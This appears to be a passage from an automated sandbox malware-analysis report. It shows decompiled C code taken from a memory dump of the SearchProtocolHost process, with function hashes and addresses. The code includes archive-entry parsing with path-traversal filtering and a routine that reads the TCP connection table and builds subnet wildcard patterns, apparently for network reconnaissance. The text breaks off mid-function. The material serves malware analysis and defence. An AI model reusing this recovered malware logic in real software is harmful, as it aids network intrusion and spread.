                                                Control-flow Graph

                                                C-Code - Quality: 84%
                                                			E02FAF4E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int _a4, void* _a8) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v540;
                                                				unsigned int _v568;
                                                				signed int _v592;
                                                				signed int _v596;
                                                				unsigned int _v604;
                                                				unsigned int _v620;
                                                				struct _FILETIME _v628;
                                                				struct _FILETIME _v636;
                                                				intOrPtr* _v640;
                                                				signed int _v644;
                                                				signed int _v648;
                                                				signed int _v652;
                                                				signed int _v656;
                                                				char _v658;
                                                				char _v659;
                                                				signed int _v660;
                                                				signed int _v664;
                                                				void* __esi;
                                                				signed int _t195;
                                                				signed int _t199;
                                                				signed int _t204;
                                                				signed int _t205;
                                                				signed int _t208;
                                                				void* _t209;
                                                				signed int _t212;
                                                				signed int _t213;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t216;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t223;
                                                				signed int _t235;
                                                				signed int _t244;
                                                				signed int _t250;
                                                				signed int _t253;
                                                				signed int _t254;
                                                				signed char _t255;
                                                				signed int _t262;
                                                				signed int _t264;
                                                				signed int _t270;
                                                				signed int _t271;
                                                				signed int _t273;
                                                				signed int _t279;
                                                				signed int _t280;
                                                				signed int _t282;
                                                				signed int _t289;
                                                				signed int _t294;
                                                				signed int _t296;
                                                				void* _t307;
                                                				signed int _t312;
                                                				signed int _t319;
                                                				signed int _t328;
                                                				signed int _t330;
                                                				signed char _t334;
                                                				long _t338;
                                                				signed int _t339;
                                                				intOrPtr* _t345;
                                                				signed int _t348;
                                                				signed int _t356;
                                                				signed int _t361;
                                                				unsigned int _t380;
                                                				unsigned int _t382;
                                                				void* _t383;
                                                				signed int _t384;
                                                				signed int _t385;
                                                				signed int _t390;
                                                				intOrPtr _t392;
                                                				signed int* _t395;
                                                				signed int _t409;
                                                				void* _t410;
                                                				void* _t411;
                                                				intOrPtr* _t413;
                                                				void* _t414;
                                                				void* _t416;
                                                				void* _t417;
                                                				void* _t418;
                                                				void* _t419;
                                                				void* _t421;
                                                				signed int _t422;
                                                				signed int _t424;
                                                				signed int _t427;
                                                				signed int _t428;
                                                				void* _t430;
                                                
                                                				_t424 = (_t422 & 0xfffffff8) - 0x294;
                                                				_t195 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t195 ^ _t424;
                                                				_t307 = _a8;
                                                				_t409 = _a4;
                                                				_v652 = _t307;
                                                				_t395 = __ecx;
                                                				_v640 = __ecx;
                                                				if(_t409 < 0xffffffff) {
                                                					L81:
                                                					_pop(_t410);
                                                					__eflags = _v8 ^ _t424;
                                                					return E02FB0A5D(_v8 ^ _t424, _t410);
                                                				} else {
                                                					_t318 =  *__ecx;
                                                					if(_t409 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                						goto L81;
                                                					} else {
                                                						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                							E02FAF2D0(_t318, __edx);
                                                						}
                                                						_t395[1] = 0xffffffff;
                                                						if(_t409 != _t395[0x4d]) {
                                                							__eflags = _t409 - 0xffffffff;
                                                							if(_t409 != 0xffffffff) {
                                                								_t319 =  *_t395;
                                                								__eflags = _t409 -  *((intOrPtr*)(_t319 + 0x10));
                                                								if(_t409 <  *((intOrPtr*)(_t319 + 0x10))) {
                                                									E02FAEC60(_t319);
                                                								}
                                                								_t199 =  *_t395;
                                                								__eflags =  *((intOrPtr*)(_t199 + 0x10)) - _t409;
                                                								if( *((intOrPtr*)(_t199 + 0x10)) < _t409) {
                                                									_t312 = _t409;
                                                									do {
                                                										_t409 =  *_t395;
                                                										__eflags = _t409;
                                                										if(_t409 != 0) {
                                                											__eflags =  *(_t409 + 0x18);
                                                											if( *(_t409 + 0x18) != 0) {
                                                												_t392 =  *((intOrPtr*)(_t409 + 0x10)) + 1;
                                                												__eflags = _t392 -  *((intOrPtr*)(_t409 + 4));
                                                												if(_t392 !=  *((intOrPtr*)(_t409 + 4))) {
                                                													 *((intOrPtr*)(_t409 + 0x10)) = _t392;
                                                													 *((intOrPtr*)(_t409 + 0x14)) =  *((intOrPtr*)(_t409 + 0x14)) +  *((intOrPtr*)(_t409 + 0x48)) + 0x2e +  *((intOrPtr*)(_t409 + 0x50)) +  *((intOrPtr*)(_t409 + 0x4c));
                                                													_t294 = E02FAE7C0(_t409, _t409 + 0x28, _t409 + 0x78, 0, 0); // executed
                                                													_t424 = _t424 - 0x10 + 0x1c;
                                                													asm("sbb eax, eax");
                                                													_t296 =  ~_t294 + 1;
                                                													__eflags = _t296;
                                                													 *(_t409 + 0x18) = _t296;
                                                												}
                                                											}
                                                										}
                                                										_t289 =  *_t395;
                                                										__eflags =  *((intOrPtr*)(_t289 + 0x10)) - _t312;
                                                									} while ( *((intOrPtr*)(_t289 + 0x10)) < _t312);
                                                									_t307 = _v652;
                                                								}
                                                								E02FAE7C0( *_t395,  &_v620, 0,  &_v540, 0x104); // executed
                                                								_t204 = E02FAECA0( *_t395,  &_v648, __eflags,  &_v652,  &_v664); // executed
                                                								_t427 = _t424 - 0x10 + 0x24;
                                                								__eflags = _t204;
                                                								if(_t204 == 0) {
                                                									_t205 = E02FAE170( *( *_t395), _v652, 0); // executed
                                                									_t428 = _t427 + 4;
                                                									__eflags = _t205;
                                                									if(__eflags != 0) {
                                                										L24:
                                                										_pop(_t411);
                                                										__eflags = _v8 ^ _t428;
                                                										return E02FB0A5D(_v8 ^ _t428, _t411);
                                                									} else {
                                                										_push(_v664);
                                                										_t208 = E02FB0AB4(_t409, __eflags);
                                                										_t412 = _t208;
                                                										_v656 = _t208;
                                                										_t209 = E02FAE200(_t208, 1, _v664,  *( *_t395));
                                                										_t430 = _t428 + 0xc;
                                                										__eflags = _t209 - _v664;
                                                										if(_t209 == _v664) {
                                                											_t328 = 0;
                                                											__eflags = 0;
                                                											 *_t307 =  *( *_t395 + 0x10);
                                                											do {
                                                												_t212 =  *((intOrPtr*)(_t430 + _t328 + 0x88));
                                                												_t328 = _t328 + 1;
                                                												 *((char*)(_t430 + _t328 + 0x18f)) = _t212;
                                                												__eflags = _t212;
                                                											} while (_t212 != 0);
                                                											_t413 =  &_v276;
                                                											while(1) {
                                                												_t213 =  *_t413;
                                                												__eflags = _t213;
                                                												if(_t213 == 0) {
                                                													goto L31;
                                                												}
                                                												L29:
                                                												__eflags =  *((char*)(_t413 + 1)) - 0x3a;
                                                												if( *((char*)(_t413 + 1)) == 0x3a) {
                                                													_t413 = _t413 + 2;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												L31:
                                                												__eflags = _t213 - 0x5c;
                                                												if(_t213 == 0x5c) {
                                                													_t413 = _t413 + 1;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												__eflags = _t213 - 0x2f;
                                                												if(_t213 == 0x2f) {
                                                													_t413 = _t413 + 1;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t214 = E02FB5FFF(_t413, "\\..\\");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t214;
                                                												if(_t214 != 0) {
                                                													_t61 = _t214 + 4; // 0x4
                                                													_t413 = _t61;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t215 = E02FB5FFF(_t413, "\\../");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t215;
                                                												if(_t215 != 0) {
                                                													_t62 = _t215 + 4; // 0x4
                                                													_t413 = _t62;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                												}
                                                												_t216 = E02FB5FFF(_t413, "/../");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t216;
                                                												if(_t216 != 0) {
                                                													_t63 = _t216 + 4; // 0x4
                                                													_t413 = _t63;
                                                													while(1) {
                                                														_t213 =  *_t413;
                                                														__eflags = _t213;
                                                														if(_t213 == 0) {
                                                															goto L31;
                                                														}
                                                														goto L29;
                                                													}
                                                													goto L31;
                                                												}
                                                												_t217 = E02FB5FFF(_t413, "/..\\");
                                                												_t430 = _t430 + 8;
                                                												__eflags = _t217;
                                                												if(_t217 != 0) {
                                                													_t64 = _t217 + 4; // 0x4
                                                													_t413 = _t64;
                                                													continue;
                                                												}
                                                												_t65 = _t307 + 4; // 0x2fa5092
                                                												_t330 = _t65 - _t413;
                                                												__eflags = _t330;
                                                												do {
                                                													_t218 =  *_t413;
                                                													_t413 = _t413 + 1;
                                                													 *((char*)(_t330 + _t413 - 1)) = _t218;
                                                													__eflags = _t218;
                                                												} while (_t218 != 0);
                                                												_t380 = _v568;
                                                												_v660 = _t380 >> 0x0000001e & 0xffffff01;
                                                												_t334 =  !(_t380 >> 0x17) & 0x00000001;
                                                												_t223 = _v620 >> 8;
                                                												_v648 = 0;
                                                												_v652 = 0;
                                                												_v644 = 1;
                                                												__eflags = _t223;
                                                												if(_t223 == 0) {
                                                													L49:
                                                													_t334 = _t380 & 0x00000001;
                                                													_v648 = _t380 >> 0x00000001 & 0xffffff01;
                                                													_v652 = _t380 >> 0x00000002 & 0xffffff01;
                                                													_v660 = _t380 >> 0x00000004 & 0x00000001;
                                                													_t235 = _t380 >> 0x00000005 & 0xffffff01;
                                                													__eflags = _t235;
                                                													_v644 = _t235;
                                                												} else {
                                                													__eflags = _t223 - 7;
                                                													if(_t223 == 7) {
                                                														goto L49;
                                                													} else {
                                                														__eflags = _t223 - 0xb;
                                                														if(_t223 == 0xb) {
                                                															goto L49;
                                                														} else {
                                                															__eflags = _t223 - 0xe;
                                                															if(_t223 == 0xe) {
                                                																goto L49;
                                                															}
                                                														}
                                                													}
                                                												}
                                                												__eflags = _v660;
                                                												_t237 =  !=  ? 0x10 : 0;
                                                												__eflags = _v644;
                                                												 *(_t307 + 0x108) =  !=  ? 0x10 : 0;
                                                												if(_v644 != 0) {
                                                													_t82 = _t307 + 0x108;
                                                													 *_t82 =  *(_t307 + 0x108) | 0x00000020;
                                                													__eflags =  *_t82;
                                                												}
                                                												__eflags = _v648;
                                                												if(_v648 != 0) {
                                                													_t85 = _t307 + 0x108;
                                                													 *_t85 =  *(_t307 + 0x108) | 0x00000002;
                                                													__eflags =  *_t85;
                                                												}
                                                												__eflags = _t334;
                                                												if(_t334 != 0) {
                                                													_t87 = _t307 + 0x108;
                                                													 *_t87 =  *(_t307 + 0x108) | 0x00000001;
                                                													__eflags =  *_t87;
                                                												}
                                                												__eflags = _v652;
                                                												if(_v652 != 0) {
                                                													_t90 = _t307 + 0x108;
                                                													 *_t90 =  *(_t307 + 0x108) | 0x00000004;
                                                													__eflags =  *_t90;
                                                												}
                                                												_t382 = _v604;
                                                												 *(_t307 + 0x124) = _v596;
                                                												 *(_t307 + 0x128) = _v592;
                                                												_v636.dwLowDateTime = E02FAF350(_t382 >> 0x10, _t382);
                                                												_v636.dwHighDateTime = _t382;
                                                												LocalFileTimeToFileTime( &_v636,  &_v628);
                                                												_t338 = _v628.dwLowDateTime;
                                                												_t414 = 0;
                                                												__eflags = _v664 - 4;
                                                												_t244 = _v628.dwHighDateTime;
                                                												 *(_t307 + 0x10c) = _t338;
                                                												 *(_t307 + 0x110) = _t244;
                                                												 *(_t307 + 0x114) = _t338;
                                                												 *(_t307 + 0x118) = _t244;
                                                												 *(_t307 + 0x11c) = _t338;
                                                												 *(_t307 + 0x120) = _t244;
                                                												if(_v664 <= 4) {
                                                													L77:
                                                													_t339 = _v656;
                                                												} else {
                                                													_t250 = _v656;
                                                													_v658 = 0;
                                                													_t383 = _t250 + 1;
                                                													while(1) {
                                                														L61:
                                                														_t345 = "UT";
                                                														_v660 =  *(_t414 + _t250) & 0x000000ff;
                                                														_v659 =  *(_t383 + _t414) & 0x000000ff;
                                                														_t253 =  &_v660;
                                                														while(1) {
                                                															_t384 =  *_t253;
                                                															__eflags = _t384 -  *_t345;
                                                															if(_t384 !=  *_t345) {
                                                																break;
                                                															}
                                                															__eflags = _t384;
                                                															if(_t384 == 0) {
                                                																L66:
                                                																_t254 = 0;
                                                															} else {
                                                																_t390 =  *((intOrPtr*)(_t253 + 1));
                                                																_t120 = _t345 + 1; // 0x25000054
                                                																__eflags = _t390 -  *_t120;
                                                																if(_t390 !=  *_t120) {
                                                																	break;
                                                																} else {
                                                																	_t253 = _t253 + 2;
                                                																	_t345 = _t345 + 2;
                                                																	__eflags = _t390;
                                                																	if(_t390 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L66;
                                                																	}
                                                																}
                                                															}
                                                															L68:
                                                															__eflags = _t254;
                                                															if(_t254 == 0) {
                                                																_t385 = _v656;
                                                																_v660 = 0x989680;
                                                																_t255 =  *(_t414 + _t385 + 4) & 0x000000ff;
                                                																_t417 = _t414 + 5;
                                                																_v664 = _t255;
                                                																_v664 = _v664 >> 2;
                                                																_v664 = _v664 & 0x00000001;
                                                																_t348 = _t255 >> 0x00000001 & 0xffffff01;
                                                																_v652 = _t348;
                                                																__eflags = _t255 & 0x00000001;
                                                																if((_t255 & 0x00000001) != 0) {
                                                																	_t361 =  *(_t417 + _t385) & 0x000000ff;
                                                																	_t279 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
                                                																	_t417 = _t417 + 4;
                                                																	_t280 = _t279 | _t361;
                                                																	_t282 = _t280 * _v660 + 0xd53e8000;
                                                																	__eflags = _t282;
                                                																	 *(_t307 + 0x11c) = _t282;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x120) = _t280 * _v660 >> 0x20;
                                                																	_t385 = _v656;
                                                																	_t348 = _v652;
                                                																}
                                                																__eflags = _t348;
                                                																if(_t348 != 0) {
                                                																	_t356 =  *(_t417 + _t385) & 0x000000ff;
                                                																	_t270 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
                                                																	_t417 = _t417 + 4;
                                                																	_t271 = _t270 | _t356;
                                                																	_t273 = _t271 * _v660 + 0xd53e8000;
                                                																	__eflags = _t273;
                                                																	 *(_t307 + 0x10c) = _t273;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x110) = _t271 * _v660 >> 0x20;
                                                																}
                                                																__eflags = _v664;
                                                																if(_v664 != 0) {
                                                																	_t262 = ((( *(_t417 + _v656 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 1) & 0x000000ff) << 0x00000008 |  *(_t417 + _t386) & 0x000000ff;
                                                																	_t264 = _t262 * _v660 + 0xd53e8000;
                                                																	__eflags = _t264;
                                                																	 *(_t307 + 0x114) = _t264;
                                                																	asm("adc edx, 0x19db1de");
                                                																	 *(_t307 + 0x118) = _t262 * _v660 >> 0x20;
                                                																}
                                                																goto L77;
                                                															} else {
                                                																_t339 = _v656;
                                                																_t383 = _t339 + 1;
                                                																_t414 = _t414 + ( *(_t414 + _t339 + 2) & 0x000000ff) + 4;
                                                																_t125 = _t414 + 4; // 0x4
                                                																__eflags = _t125 - _v664;
                                                																if(_t125 < _v664) {
                                                																	_t250 = _v656;
                                                																	goto L61;
                                                																} else {
                                                																}
                                                															}
                                                															goto L78;
                                                														}
                                                														asm("sbb eax, eax");
                                                														_t254 = _t253 | 0x00000001;
                                                														__eflags = _t254;
                                                														goto L68;
                                                													}
                                                												}
                                                												L78:
                                                												__eflags = _t339;
                                                												if(_t339 != 0) {
                                                													E02FB0AAF(_t339);
                                                													_t430 = _t430 + 4;
                                                												}
                                                												 *(memcpy( &(_t395[2]), _t307, 0x4b << 2) + 0x134) = _a4;
                                                												_pop(_t416);
                                                												__eflags = _v8 ^ _t430 + 0xc;
                                                												return E02FB0A5D(_v8 ^ _t430 + 0xc, _t416);
                                                												goto L82;
                                                											}
                                                										} else {
                                                											E02FB0AAF(_t412);
                                                											_t428 = _t430 + 4;
                                                											goto L24;
                                                										}
                                                									}
                                                								} else {
                                                									_pop(_t418);
                                                									__eflags = _v8 ^ _t427;
                                                									return E02FB0A5D(_v8 ^ _t427, _t418);
                                                								}
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							if(_t409 == 0xffffffff) {
                                                								L8:
                                                								 *_t307 =  *( *_t395 + 4);
                                                								 *((char*)(_t307 + 4)) = 0;
                                                								 *(_t307 + 0x108) = 0;
                                                								 *(_t307 + 0x10c) = 0;
                                                								 *(_t307 + 0x110) = 0;
                                                								 *(_t307 + 0x114) = 0;
                                                								 *(_t307 + 0x118) = 0;
                                                								 *(_t307 + 0x11c) = 0;
                                                								 *(_t307 + 0x120) = 0;
                                                								 *(_t307 + 0x124) = 0;
                                                								 *(_t307 + 0x128) = 0;
                                                								_pop(_t419);
                                                								__eflags = _v8 ^ _t424;
                                                								return E02FB0A5D(_v8 ^ _t424, _t419);
                                                							} else {
                                                								memcpy(_t307,  &(_t395[2]), 0x4b << 2);
                                                								_pop(_t421);
                                                								return E02FB0A5D(_v8 ^ _t424 + 0xc, _t421);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L82:
                                                			}
                                                0x02faf80b
                                                0x02faf806
                                                0x02faf852
                                                0x02faf856
                                                0x02faf859
                                                0x02faf85e
                                                0x02faf864
                                                0x02faf866
                                                0x02faf866
                                                0x02faf866
                                                0x02faf866
                                                0x02faf86d
                                                0x02faf872
                                                0x02faf874
                                                0x02faf874
                                                0x02faf874
                                                0x02faf874
                                                0x02faf87b
                                                0x02faf87d
                                                0x02faf87f
                                                0x02faf87f
                                                0x02faf87f
                                                0x02faf87f
                                                0x02faf886
                                                0x02faf88b
                                                0x02faf88d
                                                0x02faf88d
                                                0x02faf88d
                                                0x02faf88d
                                                0x02faf894
                                                0x02faf89e
                                                0x02faf8ab
                                                0x02faf8b6
                                                0x02faf8c3
                                                0x02faf8c8
                                                0x02faf8ce
                                                0x02faf8d2
                                                0x02faf8d4
                                                0x02faf8d9
                                                0x02faf8dd
                                                0x02faf8e3
                                                0x02faf8e9
                                                0x02faf8ef
                                                0x02faf8f5
                                                0x02faf8fb
                                                0x02faf901
                                                0x02fafa9f
                                                0x02fafa9f
                                                0x02faf907
                                                0x02faf907
                                                0x02faf90b
                                                0x02faf910
                                                0x02faf924
                                                0x02faf924
                                                0x02faf928
                                                0x02faf92d
                                                0x02faf935
                                                0x02faf939
                                                0x02faf940
                                                0x02faf940
                                                0x02faf942
                                                0x02faf944
                                                0x00000000
                                                0x00000000
                                                0x02faf946
                                                0x02faf948
                                                0x02faf95c
                                                0x02faf95c
                                                0x02faf94a
                                                0x02faf94a
                                                0x02faf94d
                                                0x02faf94d
                                                0x02faf950
                                                0x00000000
                                                0x02faf952
                                                0x02faf952
                                                0x02faf955
                                                0x02faf958
                                                0x02faf95a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf95a
                                                0x02faf950
                                                0x02faf965
                                                0x02faf965
                                                0x02faf967
                                                0x02faf988
                                                0x02faf98c
                                                0x02faf994
                                                0x02faf999
                                                0x02faf99e
                                                0x02faf9a2
                                                0x02faf9a7
                                                0x02faf9ae
                                                0x02faf9b4
                                                0x02faf9b8
                                                0x02faf9ba
                                                0x02faf9d5
                                                0x02faf9d9
                                                0x02faf9dc
                                                0x02faf9df
                                                0x02faf9e5
                                                0x02faf9e5
                                                0x02faf9ea
                                                0x02faf9f0
                                                0x02faf9f8
                                                0x02faf9fe
                                                0x02fafa05
                                                0x02fafa05
                                                0x02fafa09
                                                0x02fafa0b
                                                0x02fafa26
                                                0x02fafa2a
                                                0x02fafa2d
                                                0x02fafa30
                                                0x02fafa36
                                                0x02fafa36
                                                0x02fafa3b
                                                0x02fafa41
                                                0x02fafa49
                                                0x02fafa4f
                                                0x02fafa52
                                                0x02fafa57
                                                0x02fafa7d
                                                0x02fafa83
                                                0x02fafa83
                                                0x02fafa88
                                                0x02fafa8e
                                                0x02fafa96
                                                0x02fafa9c
                                                0x00000000
                                                0x02faf969
                                                0x02faf969
                                                0x02faf972
                                                0x02faf978
                                                0x02faf97a
                                                0x02faf97d
                                                0x02faf981
                                                0x02faf920
                                                0x00000000
                                                0x00000000
                                                0x02faf983
                                                0x02faf981
                                                0x00000000
                                                0x02faf967
                                                0x02faf960
                                                0x02faf962
                                                0x02faf962
                                                0x00000000
                                                0x02faf962
                                                0x02faf924
                                                0x02fafaa3
                                                0x02fafaa3
                                                0x02fafaa5
                                                0x02fafaa8
                                                0x02fafaad
                                                0x02fafaad
                                                0x02fafac3
                                                0x02fafacc
                                                0x02fafad5
                                                0x02fafadf
                                                0x00000000
                                                0x02fafadf
                                                0x02faf6f1
                                                0x02faf6f2
                                                0x02faf6f7
                                                0x00000000
                                                0x02faf6f7
                                                0x02faf6ef
                                                0x02faf690
                                                0x02faf696
                                                0x02faf69f
                                                0x02faf6a9
                                                0x02faf6a9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf53b
                                                0x02faf53e
                                                0x02faf56a
                                                0x02faf56f
                                                0x02faf573
                                                0x02faf577
                                                0x02faf581
                                                0x02faf58b
                                                0x02faf595
                                                0x02faf59f
                                                0x02faf5a9
                                                0x02faf5b3
                                                0x02faf5bd
                                                0x02faf5c7
                                                0x02faf5d2
                                                0x02faf5db
                                                0x02faf5e5
                                                0x02faf540
                                                0x02faf54c
                                                0x02faf54f
                                                0x02faf562
                                                0x02faf562
                                                0x02faf53e
                                                0x02faf539
                                                0x02faf51b
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /../$/..\$\../$\..\
                                                • API String ID: 0-3885502717
                                                • Opcode ID: 9514668eb6847c4257f9c8c1f582a0a69168aa6cd1f8387c2776cc653caa7946
                                                • Instruction ID: 9a8a821be379267d75c1395609cc6b378cb718a8073ffc6c9291d3dde94a21bb
                                                • Opcode Fuzzy Hash: 9514668eb6847c4257f9c8c1f582a0a69168aa6cd1f8387c2776cc653caa7946
                                                • Instruction Fuzzy Hash: 8702E7B1A043418FC725CF28C8A17A6BBE1BF85354F184B6DD9DA8F681C736E509CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FB15D6() {
                                                				_Unknown_base(*)()* _t1;
                                                
                                                				_t1 = SetUnhandledExceptionFilter(E02FB15E2); // executed
                                                				return _t1;
                                                			}




                                                0x02fb15db
                                                0x02fb15e1

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_000115E2,02FB1014), ref: 02FB15DB
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: cc0237b9ef40b53beee8a6da82ab3bb8356973b41a424afd53a09153a35a7b7f
                                                • Instruction ID: 8743ad2b38db563fe0d1b1e8b3a557d961f358eed0400b56b81d9a26edb123b2
                                                • Opcode Fuzzy Hash: cc0237b9ef40b53beee8a6da82ab3bb8356973b41a424afd53a09153a35a7b7f
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E02FA5200(void* __ebx, void* __edi) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v148;
                                                				intOrPtr _v152;
                                                				long _v156;
                                                				char _v172;
                                                				intOrPtr _v176;
                                                				long _v180;
                                                				char _v196;
                                                				intOrPtr _v200;
                                                				long _v204;
                                                				char _v220;
                                                				signed int _v224;
                                                				long _v228;
                                                				void* _v232;
                                                				signed int _v236;
                                                				intOrPtr _v240;
                                                				signed int* _v244;
                                                				signed int _v248;
                                                				void* __esi;
                                                				signed int _t127;
                                                				signed int _t128;
                                                				long* _t136;
                                                				long* _t137;
                                                				void* _t143;
                                                				signed int _t155;
                                                				intOrPtr* _t160;
                                                				intOrPtr _t161;
                                                				intOrPtr _t163;
                                                				signed int _t164;
                                                				signed int _t168;
                                                				intOrPtr* _t171;
                                                				intOrPtr* _t172;
                                                				signed int _t173;
                                                				intOrPtr _t179;
                                                				intOrPtr _t183;
                                                				intOrPtr _t186;
                                                				signed int _t189;
                                                				signed int _t193;
                                                				intOrPtr* _t195;
                                                				long _t196;
                                                				signed int _t200;
                                                				signed int _t207;
                                                				void* _t215;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int _t219;
                                                				signed int* _t224;
                                                				intOrPtr* _t225;
                                                				signed int _t226;
                                                				intOrPtr* _t229;
                                                				signed int _t230;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				intOrPtr* _t237;
                                                				signed int _t238;
                                                				long _t242;
                                                				long _t245;
                                                				void* _t247;
                                                				intOrPtr _t250;
                                                				intOrPtr _t251;
                                                				intOrPtr* _t253;
                                                				void* _t254;
                                                				void* _t255;
                                                				void* _t256;
                                                				signed int _t257;
                                                				void* _t258;
                                                				void* _t260;
                                                
                                                				_push(0xffffffff);
                                                				_push(E02FC456F);
                                                				_push( *[fs:0x0]);
                                                				_t127 =  *0x2fcf008; // 0x93ad1eea
                                                				_t128 = _t127 ^ _t257;
                                                				_v20 = _t128;
                                                				_push(__edi);
                                                				_push(_t128);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v224 = 0;
                                                				_v236 = 0;
                                                				Sleep(0x1388); // executed
                                                				E02FB3440(__edi,  &_v148, 0, 0x80);
                                                				_t253 = GetProcessHeap;
                                                				_t260 = _t258 - 0xe8 + 0xc;
                                                				_v228 = 0;
                                                				_t215 = HeapAlloc(GetProcessHeap(), 0, 0x18);
                                                				_v232 = _t215;
                                                				if(_t215 == 0) {
                                                					L80:
                                                					 *[fs:0x0] = _v16;
                                                					_pop(_t254);
                                                					return E02FB0A5D(_v20 ^ _t257, _t254);
                                                				}
                                                				_t250 = HeapFree;
                                                				do {
                                                					_t136 =  &_v228;
                                                					_v228 = 0x18;
                                                					__imp__GetTcpTable(_t215, _t136, 1);
                                                					if(_t136 != 0x7a) {
                                                						L4:
                                                						_t137 =  &_v228;
                                                						__imp__GetTcpTable(_t215, _t137, 1);
                                                						if(_t137 != 0) {
                                                							HeapFree(GetProcessHeap(), 0, _t215);
                                                							goto L80;
                                                						}
                                                						_v240 = _t137;
                                                						if( *_t215 <= _t137) {
                                                							goto L77;
                                                						}
                                                						_t14 = _t215 + 0x10; // 0x10
                                                						_t224 = _t14;
                                                						_v244 = _t224;
                                                						asm("o16 nop [eax+eax]");
                                                						do {
                                                							_t217 =  *_t224;
                                                							_v248 = _t217;
                                                							E02FB3440(_t250,  &_v148, 0, 0x80);
                                                							_push(_t217 >> 0x00000010 & 0x000000ff);
                                                							_push(_t217 >> 0x00000008 & 0x000000ff);
                                                							E02FA5180( &_v148, 0x80, "%d.%d.%d.*", _t217 & 0x000000ff);
                                                							_t260 = _t260 + 0x24;
                                                							if(_t217 == 0xa) {
                                                								L14:
                                                								__eflags = _v148;
                                                								_v152 = 0xf;
                                                								_v156 = 0;
                                                								_v172 = 0;
                                                								if(_v148 != 0) {
                                                									_t225 =  &_v148;
                                                									_t24 = _t225 + 1; // 0x1
                                                									_t246 = _t24;
                                                									asm("o16 nop [eax+eax]");
                                                									do {
                                                										_t155 =  *_t225;
                                                										_t225 = _t225 + 1;
                                                										__eflags = _t155;
                                                									} while (_t155 != 0);
                                                									_t226 = _t225 - _t246;
                                                									__eflags = _t226;
                                                									L19:
                                                									_push(_t226);
                                                									_push( &_v148);
                                                									E02FA5A00(_t217,  &_v172, _t250, _t253);
                                                									_t250 =  *0x2fd6a8c;
                                                									_t255 = E02FA6530( &_v172,  &_v172);
                                                									_t160 =  *0x2fd6a8c;
                                                									__eflags = _t255 - _t160;
                                                									if(_t255 == _t160) {
                                                										L29:
                                                										_t253 = _t160;
                                                										L30:
                                                										_t161 = _v152;
                                                										__eflags = _t253 - _t250;
                                                										_t218 = _t217 & 0xffffff00 | _t253 == _t250;
                                                										__eflags = _t161 - 0x10;
                                                										if(_t161 >= 0x10) {
                                                											__eflags = _t161 + 1;
                                                											E02FA5CF0(_t218, _t246, _t250, _v172, _t161 + 1);
                                                										}
                                                										__eflags = _t218;
                                                										if(_t218 == 0) {
                                                											goto L75;
                                                										} else {
                                                											__eflags = _v148;
                                                											_v152 = 0xf;
                                                											_v156 = 0;
                                                											_v172 = 0;
                                                											if(_v148 != 0) {
                                                												_t229 =  &_v148;
                                                												_t50 = _t229 + 1; // 0x1
                                                												_t246 = _t50;
                                                												do {
